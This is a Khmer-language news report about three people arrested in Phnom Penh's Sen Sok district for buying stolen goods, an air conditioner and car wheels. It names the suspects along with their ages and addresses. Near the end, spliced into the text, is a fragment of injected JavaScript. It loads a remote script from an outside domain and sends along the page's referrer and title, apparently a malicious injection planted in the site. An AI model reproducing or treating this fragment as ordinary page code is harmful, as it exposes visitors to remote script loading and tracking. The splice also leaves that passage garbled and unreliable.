Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

(Video) នគរបាលខណ្ឌសែនសុខឃាត់មនុស្ស៣នាក់ករណីចោរកម្ម

ភ្នំពេញ៖ ជនសង្ស័យប្រុសស្រី០៣នាក់ត្រូវកម្លាំងព្រហ្មទណ្ឌខណ្ឌសែនសុខសហការណ៍ជាមួយប៉ុស្តិ៍នគរបាលរដ្ឋបាលក្រាំងធ្នង់ចាប់ឃាត់ខ្លួនដល់ផ្ទះដោយជាប់ពាក់ព័ន្ធទទួលផលចោរកម្ម (ទិញម៉ាសីុនត្រជាក់់ យ៉ាន់រថយន្តនិងកង ៣ពីចោរ)។ការឃាត់ខ្លួនជនសង្ស័យខាងលើនេះកាលពីម៉ោង១៤និង៣០នាទីនៅចំណុចផ្ទះល្វែងក្នុងបុរីពិភពថ្មីលេខ១៨១ ផ្លូវ Gភូមិក្រាំងអង្ក្រងសង្កាត់ក្រាំងធ្នង់ខណ្ឌសែនសុខ។

ជនសង្ស័យទី១ឈ្មោះអៃ សារ៉ែន ភេទប្រុសអាយុ៣១ឆ្នាំមុខរបរទិញសម្ភារះចោរស្នាក់នៅក្នុងបុរីពិភពថ្មីលេខ ១៨១ ផ្លូវGភូមិក្រាំងអង្ក្រងសង្កាត់ក្រាំងធ្នង់ខណ្ឌសែនសុខមានស្រុកកំណើតភូមិពាក់បង្អោងឃុំត្រពាំងធំខាងជើង ស្រុកត្រាំកក់ខេត្តតែកែវ។

ជនសង្ស័យទី២ឈ្មោះជេត រ៉ានី ភេទស្រីអាយុ៣០ឆ្នាំមុខរបរមេផ្ទះជាប្រពន្ធជនសង្ស័យ ឈ្មោះអៃ សារ៉ែន(រួមគំនិតនិងប្តី)។
ជនសង្ស័យទី៣ឈ្មោះគុយ ឡយ ភេទប្រុសអាយុ២៤ឆ្នាំមុខរបរលក់កង់រថយន្តស្នាក់នៅផ្ទះផ្លូវ១៩៦២ភូមិក្រាំងអង្ក្រងសង្កាត់ក្រាំងធ្នង់ខណ្ឌសែនសុខ។
ចំណែកដើមបណ្តឹងឈ្មោះហៀប ហុន ភេទប្រុសអាយុ៣៧ឆ្នាំមុខរបរលក់ដូរស្នាក់នៅផ្ទះលេខ១៤៨ផ្លូវFក្នុងបុរីពិភពថ្មូភូមិក្រាំងអង្ក្រងសង្កាត់ក្រាំងធ្នង់ខណ្ឌសែនសុខ(បាត់ម៉ាសីុនត្រជាក់១ឈុតនិងយ៉ាន់រថយន្ត ឡិចសីុស ៤គ្រាប់)។

តាមសំដីដើមបណឹងបានប្រាប់ថាកាលពីថ្ងៃទី១១វិច្ឆិការ២០១៦គាត់បាននាំក្រុមក្រួសារទៅលេងស្រុកដោយស្រាប់ តែឳពុកគាត់បានទូរសព្ទប្រាប់ថាមានចោរឡើងលួចសម្ភារះដែលទុកលើដំបូលផ្ទះក្នុងនោះមានម៉ាសីុត្រជាក់មួយ ឈុតនិងយ៉ាន់រថយន្តឡិចសីុស៤គ្រាប់ទីបាត់ហើយពេលបាត់នោះមិនបានប្តឹងសមត្ថកិច្ចទេ។ប្រភពបានប្រាប់ទៀតថាលុះដល់ថ្ងៃទី២៦ខែវិច្ឆិការ២០១៦រថយន្តគាត់បានបែកកង់ហើយគាត់បានចូលទៅប៉ះនៅផ្ទះរបស់ ជនសង្ស័យឈ្មោះគុយ ឡយ ស្រាប់តែឃើញយ៉ាន់រថយន្តគាត់ដែលបាត់ពេលនោះគាត់ក៍សួរនាំត្រូវបានជនសង្ស័យប្រាប់ថារបស់នេះគាត់បានទិញពីបុរសម្នាក់ទៀត។

ប្រភពដដែលបានប្រាប់ទៀតថាក្រោយពីឃើញយ៉ាន់រថយន្តខាងលើហើយគាត់ក៍ប្តឹងសមត្ថកិច្ចមូ លដ្ឋាននាំខ្លួនឈ្មោះគុយ ឡយ ទៅរកអ្នកលក់អោយដល់ផ្ទះនៅចំណុចខាងលើពេលកម្លាំងសមត្ថកិច្ចទៅដល់បានជួបជនសង្ស័យជាប្តីប្រពន្ធនិងបានឃើញម៉ាសីុនត្រជាក់របស់គាត់១ឈុតទៀតដែលបាត់នោះនៅក្នុងផ្ទះជនសង្ស័យសមត្ថកិច្ចក៍
ឃាត់ប្តីប្រពន្ធខាងលើយកមកសាកសួរនៅខណ្ឌតែម្តង។

នៅចំពោះមុខសមត្ថកិច្ចប្តីប្រពន្ធខាងលើបានសារភាពថាសម្ភារះនេះខ្លួនបានទទួលទិញបន្តរពីបុរស២នាក់មិនស្គាល់ឈ្មោះដែលយកមកលក់អោយដល់ផ្ទះនិងបែកធ្លាយរឿងធ្លាប់ទិញរឺម៉កម៉ូតូចំនួន៥គ្រឿងពីបុរសទាំង២នាក់ទៀតផងដែលលួចបានហើយយកមកលក់អោយគាត់។

ដោយមានចំម្លើយសារភាពគ្រប់គ្រាន់បច្ចុប្បន្នជនសង្ស័យទទួលផលចោរកម្មទាំង០៣នាក់ត្រូវបានឃាត់ខ្លួនបណ្តោះអាសន្ននៅអធិការដ្ឋាននគរបាលខណ្ឌសែនសុខដោយឡែកនៅសល់ដៃជើង២បាក់ទៀតកម្លាំងសមត្ថកិច្ចនិងស្រាវជ្រាវចាប់ពេលក្រោយ។

9cc211d9-5ed5-4620-8004-3bd52d0c33de 14f77769-83ea-4b38-9f26-1bda2d19d19d 30d7a7fb-dd73-4257-b8b0-9d6feee9a92e 273afb45-bd2f-4aed-a176-be7162c900e3ោរកs.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More